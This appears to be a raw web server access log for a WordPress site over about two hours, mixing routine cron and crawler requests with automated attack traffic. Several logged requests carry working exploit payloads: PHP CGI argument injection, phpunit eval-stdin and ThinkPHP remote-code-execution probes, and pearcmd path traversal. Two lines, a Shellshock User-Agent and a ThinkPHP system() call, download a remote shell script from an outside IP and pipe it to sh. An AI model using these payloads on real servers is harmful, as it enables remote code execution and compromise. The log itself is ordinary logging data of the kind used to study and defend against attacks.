193.142.147.209 - - [25/Jan/2026:10:08:33 +0800] "POST / HTTP/1.1" 200 34740 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
36.133.115.36 - - [25/Jan/2026:10:14:22 +0800] "POST /wp-cron.php?doing_wp_cron=1769307262.7344279289245605468750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
93.174.93.12 - - [25/Jan/2026:10:14:22 +0800] "GET / HTTP/1.0" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36"
36.133.115.36 - - [25/Jan/2026:10:17:23 +0800] "POST /wp-cron.php?doing_wp_cron=1769307443.7011220455169677734375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
95.214.54.147 - - [25/Jan/2026:10:17:24 +0800] "GET / HTTP/1.1" 200 157416 "-" "Mozilla/5.0"
36.133.115.36 - - [25/Jan/2026:10:22:03 +0800] "POST /wp-cron.php?doing_wp_cron=1769307723.6753540039062500000000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
45.194.92.199 - - [25/Jan/2026:10:22:03 +0800] "GET / HTTP/1.1" 200 109837 "-" "Hello World"
36.133.115.36 - - [25/Jan/2026:10:28:10 +0800] "POST /wp-cron.php?doing_wp_cron=1769308090.2382009029388427734375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.219 - - [25/Jan/2026:10:28:10 +0800] "GET / HTTP/1.1" 200 34739 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [25/Jan/2026:10:35:49 +0800] "POST /wp-cron.php?doing_wp_cron=1769308549.8382198810577392578125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.8 - - [25/Jan/2026:10:35:50 +0800] "GET / HTTP/1.1" 200 157416 "-" "-"
51.68.236.68 - - [25/Jan/2026:10:36:00 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.4; http://mj12bot.com/)"
51.68.236.68 - - [25/Jan/2026:10:36:01 +0800] "GET / HTTP/1.1" 200 40638 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.4; http://mj12bot.com/)"
36.133.115.36 - - [25/Jan/2026:10:41:05 +0800] "POST /wp-cron.php?doing_wp_cron=1769308865.0006530284881591796875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
190.106.78.26 - - [25/Jan/2026:10:41:05 +0800] "GET / HTTP/1.1" 200 157416 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
114.119.133.228 - - [25/Jan/2026:10:41:07 +0800] "GET /wp-sitemap.xml HTTP/1.1" 501 253 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
36.133.115.36 - - [25/Jan/2026:10:49:48 +0800] "POST /wp-cron.php?doing_wp_cron=1769309388.3575599193572998046875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
171.105.76.5 - - [25/Jan/2026:10:49:48 +0800] "GET / HTTP/1.1" 200 157416 "-" "-"
36.133.115.36 - - [25/Jan/2026:10:52:04 +0800] "POST /wp-cron.php?doing_wp_cron=1769309524.0961389541625976562500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
74.249.192.232 - - [25/Jan/2026:10:52:04 +0800] "GET /developmentserver/metadatauploader HTTP/1.1" 404 8951 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [25/Jan/2026:10:52:18 +0800] "POST /wp-cron.php?doing_wp_cron=1769309538.0640099048614501953125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
123.178.210.119 - - [25/Jan/2026:10:52:18 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
36.133.115.36 - - [25/Jan/2026:10:59:09 +0800] "POST /wp-cron.php?doing_wp_cron=1769309949.0252039432525634765625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
95.214.54.147 - - [25/Jan/2026:10:59:09 +0800] "GET / HTTP/1.1" 200 157416 "-" "Mozilla/5.0"
180.153.236.165 - - [25/Jan/2026:11:02:21 +0800] "GET / HTTP/1.1" 200 40638 "http://cqqizhou.com/" "User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0; 360Spider"
36.133.115.36 - - [25/Jan/2026:11:02:41 +0800] "POST /wp-cron.php?doing_wp_cron=1769310161.5544679164886474609375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
20.118.241.250 - - [25/Jan/2026:11:02:41 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [25/Jan/2026:11:06:14 +0800] "POST /wp-cron.php?doing_wp_cron=1769310373.9810080528259277343750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
45.156.87.161 - - [25/Jan/2026:11:06:14 +0800] "GET /.env HTTP/1.1" 404 8950 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.133.115.36 - - [25/Jan/2026:11:08:16 +0800] "POST /wp-cron.php?doing_wp_cron=1769310496.4980349540710449218750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
43.156.109.53 - - [25/Jan/2026:11:08:16 +0800] "GET / HTTP/1.1" 200 34739 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
78.29.51.27 - - [25/Jan/2026:11:14:59 +0800] "GET / HTTP/1.1" 200 171342 "http://78.29.51.27/phpneuralnetwork/?s1=CU_cqqizhou.com" "IMPORTANT! FREE! NON-CRIMINAL BLOCKCHAIN PHP NEURAL NETWORK! OWN BLOCKCHAIN SCIENTIFIC DEBT GATEWAY! OWN HOSTING AND ENCRYPTED DATABASE! LINK - http://78.29.51.27/phpneuralnetwork/?s1=CU_cqqizhou.com"
36.133.115.36 - - [25/Jan/2026:11:23:24 +0800] "POST /wp-cron.php?doing_wp_cron=1769311404.6015419960021972656250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.219 - - [25/Jan/2026:11:23:24 +0800] "GET / HTTP/1.1" 200 34739 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [25/Jan/2026:11:32:36 +0800] "POST /wp-cron.php?doing_wp_cron=1769311956.8127551078796386718750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
95.214.54.147 - - [25/Jan/2026:11:32:37 +0800] "GET / HTTP/1.1" 200 157416 "-" "Mozilla/5.0"
36.133.115.36 - - [25/Jan/2026:11:36:11 +0800] "POST /wp-cron.php?doing_wp_cron=1769312171.3837931156158447265625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
39.98.60.17 - - [25/Jan/2026:11:36:11 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36"
39.98.60.17 - - [25/Jan/2026:11:36:13 +0800] "GET / HTTP/1.1" 200 40638 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36"
52.167.144.197 - - [25/Jan/2026:11:36:43 +0800] "GET /portfolio/duplex-stainless-steel/ HTTP/1.1" 404 8950 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [25/Jan/2026:11:38:10 +0800] "POST /wp-cron.php?doing_wp_cron=1769312290.6225700378417968750000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
173.249.20.14 - - [25/Jan/2026:11:38:10 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 31367 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:13 +0800] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 157416 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:15 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:15 +0800] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:17 +0800] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:17 +0800] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:18 +0800] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:18 +0800] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:18 +0800] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:19 +0800] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:20 +0800] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:20 +0800] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:20 +0800] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:21 +0800] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:21 +0800] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:21 +0800] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:22 +0800] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:22 +0800] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:22 +0800] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:23 +0800] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:23 +0800] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:24 +0800] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:24 +0800] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:25 +0800] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:26 +0800] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:26 +0800] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:27 +0800] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:28 +0800] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:28 +0800] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:29 +0800] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:29 +0800] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:30 +0800] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:30 +0800] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:30 +0800] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:31 +0800] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:31 +0800] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:31 +0800] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:32 +0800] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:33 +0800] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
36.133.115.36 - - [25/Jan/2026:11:38:34 +0800] "POST /wp-cron.php?doing_wp_cron=1769312314.2815139293670654296875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
173.249.20.14 - - [25/Jan/2026:11:38:34 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 65811 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:35 +0800] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 27 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:36 +0800] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 200 157416 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:38 +0800] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 157416 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:40 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
173.249.20.14 - - [25/Jan/2026:11:38:41 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
36.133.115.36 - - [25/Jan/2026:11:43:31 +0800] "POST /wp-cron.php?doing_wp_cron=1769312611.9623599052429199218750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
123.60.220.90 - - [25/Jan/2026:11:43:32 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 31367 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:34 +0800] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 157416 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:35 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:35 +0800] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:35 +0800] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:35 +0800] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:35 +0800] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:35 +0800] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:37 +0800] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:37 +0800] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:37 +0800] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:37 +0800] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:38 +0800] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:38 +0800] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:39 +0800] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:39 +0800] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:39 +0800] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:39 +0800] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:40 +0800] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:40 +0800] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:40 +0800] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:40 +0800] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:41 +0800] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:41 +0800] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:41 +0800] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:41 +0800] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:41 +0800] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:41 +0800] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:41 +0800] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:41 +0800] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:42 +0800] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:42 +0800] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:42 +0800] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:42 +0800] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:42 +0800] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:42 +0800] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:42 +0800] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:42 +0800] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:42 +0800] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:45 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 65811 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:48 +0800] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 27 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:50 +0800] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 200 157416 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:43:59 +0800] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 157416 "-" "libredtail-http"
36.133.115.36 - - [25/Jan/2026:11:44:24 +0800] "POST /wp-cron.php?doing_wp_cron=1769312664.2388908863067626953125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
123.60.220.90 - - [25/Jan/2026:11:44:24 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
123.60.220.90 - - [25/Jan/2026:11:44:56 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
36.133.115.36 - - [25/Jan/2026:11:47:23 +0800] "POST /wp-cron.php?doing_wp_cron=1769312843.7801830768585205078125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
103.217.190.151 - - [25/Jan/2026:11:47:23 +0800] "GET /index.php/admin/Login/index.html HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0"
103.217.190.151 - - [25/Jan/2026:11:47:25 +0800] "GET /admin/Login/index.html HTTP/1.1" 404 8951 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0"
36.133.115.36 - - [25/Jan/2026:11:49:19 +0800] "POST /wp-cron.php?doing_wp_cron=1769312959.7418720722198486328125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
123.187.240.242 - - [25/Jan/2026:11:49:19 +0800] "GET / HTTP/1.1" 200 34739 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
192.159.99.95 - - [25/Jan/2026:11:59:41 +0800] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 499 0 "-" "Mozilla/5.0 (rondo2012@atomicmail.io)"
192.159.99.95 - - [25/Jan/2026:11:59:41 +0800] "POST /index.php?s=captcha HTTP/1.1" 499 0 "-" "Mozilla/5.0 (rondo2012@atomicmail.io)"
192.159.99.95 - - [25/Jan/2026:11:59:41 +0800] "GET / HTTP/1.1" 499 0 "-" "() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.qre.sh?=\x5C10a6267f||busybox wget -qO- http://41.231.37.153/rondo.qre.sh?=\x5C10a6267f||curl -s http://41.231.37.153/rondo.qre.sh?=\x5C10a6267f)|sh\x22& # rondo2012@atomicmail.io"
36.133.115.36 - - [25/Jan/2026:11:59:42 +0800] "POST /wp-cron.php?doing_wp_cron=1769313582.1959700584411621093750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
192.159.99.95 - - [25/Jan/2026:11:59:42 +0800] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C10a6267f%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C10a6267f%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C10a6267f%29%7Csh HTTP/1.1" 200 65811 "-" "Mozilla/5.0 (rondo2012@atomicmail.io)"
36.133.115.36 - - [25/Jan/2026:12:05:27 +0800] "POST /wp-cron.php?doing_wp_cron=1769313927.8052380084991455078125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
40.81.230.77 - - [25/Jan/2026:12:05:27 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
40.81.230.77 - - [25/Jan/2026:12:05:28 +0800] "POST / HTTP/1.1" 200 34739 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
94.102.56.99 - - [25/Jan/2026:12:05:32 +0800] "GET /html/ie.html HTTP/1.1" 404 8951 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
